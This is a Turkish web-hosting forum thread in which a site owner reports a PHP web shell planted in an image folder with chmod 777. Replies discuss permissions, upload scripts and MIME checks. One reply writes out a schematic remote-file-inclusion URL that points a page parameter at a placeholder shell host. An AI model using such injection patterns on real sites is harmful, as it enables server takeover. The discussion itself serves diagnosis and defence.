Siteme Shell atmışlar

Merhabalar;

web siteme shell atmışlar sitemde bir klasor chmod ayarı 777'idi ve oraya .php uzantılı atmışlar

bunun chmod la bir alakasımı var? yoksa kullandıgım vps de bir eksikliklermi var

Kullanmış oldugum script'te resim klasoru chmod ayarı 777

ve ora atmışlar. shelli

Sitenizde upload scripti varsa ondanda olabilir

upload scriptide yok sadece admin panelinden kaydetiğim resimler klasoru var orayıda chmod 777 yaptım resimleri çekmesi için

yani demek istediğim chmod ayarı 777 o yüzdenmi shell atmışlar resim klasoruna

Kullanıcı, grup ve sahip 777 ile çalıştırma yazma ve okuma iznine sahip olur. Bu da o kişinin buraya script atıp çalıştırması için yeterli bir sebep...

büyük bi ihtimal böle

site.com/resim.php?"açık"="http://Shell adresi.com"

sonrada shelli upload ederler bütün dizinlere ulaşırlar

Script mime tipi kontrolü yapıyor mu acaba?

bu konuya verilen cevapları bende merak ediyorum

tam olarak anlayamadım

site adresi sahane.net

shell attıkları klasör sahane.net/dosya

burdada chmod ayarı 777 sanırım ondan attılar